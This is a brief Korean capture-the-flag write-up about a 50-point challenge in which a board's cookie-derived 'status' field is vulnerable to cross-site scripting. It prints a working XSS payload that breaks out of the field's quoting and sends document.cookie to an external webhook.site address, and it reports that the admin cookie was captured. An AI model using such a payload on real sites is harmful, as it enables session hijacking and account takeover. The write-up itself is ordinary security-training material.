50점짜리인데, 쉬웠던 문제

이런 게시판이 있는데, 일반적으로 제목과 게시글에서는 터지지 않는다.

status : invite 부분에서 터진다.

status는 쿠키값에서 가져온다.

쿠키 값은 아래와 같이 <i> 와 " 로 싸여 있기 때문에 그 부분을 제거해주고 xss 코드를 입력해주면 된다.

아래는 공격에 사용한 코드이다.

"><script>document.location=%27https://webhook.site/558b0480-6db1-442c-90e1-f1decbec1592?flag=%27%2bdocument.cookie</script>//

ADMIN_COOKIE가 도착한 것을 확인할 수 있다.

끝!